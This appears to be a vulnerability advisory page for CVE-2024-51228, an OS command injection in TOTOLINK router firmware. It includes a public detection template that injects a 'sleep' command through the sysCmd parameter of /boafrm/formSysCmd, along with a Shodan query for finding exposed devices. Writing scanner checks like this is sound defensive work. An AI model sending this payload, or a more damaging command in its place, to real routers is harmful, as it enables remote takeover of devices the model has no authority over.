CVE-2024-51228: TOTOLINK CX-A3002RU - Remote Code Execution

Date: 2025-08-01 | Affected software: TOTOLINK CX-A3002RU | PoC: public

Vulnerability description

An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512, TOTOLINK-CX-N150RT V2.1.6-B20171121.1002, TOTOLINK-CX-N300RT V2.1.6-B20170724.1420, TOTOLINK-CX-N300RT V2.1.8-B20171113.1408, TOTOLINK-CX-N300RT V2.1.8-B20191010.1107, and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.

PoC code [public]

id: CVE-2024-51228

info:
  name: TOTOLINK CX-A3002RU - Remote Code Execution
  author: DhiyaneshDK
  severity: medium
  description: |
    An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
  reference:
    - https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities
    - https://totolink.tw/support_view/A3002RU
    - https://totolink.tw/support_view/N150RT
    - https://www.totolink.tw/products_view/N300RT
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 6.8
    cve-id: CVE-2024-51228
    cwe-id: CWE-78
    epss-score: 0.61706
    epss-percentile: 0.98239
  metadata:
    max-request: 1
    shodan-query: html:"TOTOLINK"
  tags: cve,cve2024,totolink,time-based-sqli,sqli,vuln,vkev

http:
  - raw:
      - |
        POST /boafrm/formSysCmd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sysCmd=sleep%206

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains(server,"Boa/0.94")'
          - "status_code == 302"
        condition: and
# digest: 490a0046304402206f2fa419b3b188478fd438ccdaf4b9e5723ac48e1337356e61da563ef475b9e5022056443f332b3878c1b8c7413e8ab54cce12c4ea0a2c6a7802bfce8dbcde998a57:922c64590222798bb761d5b6d8e72950
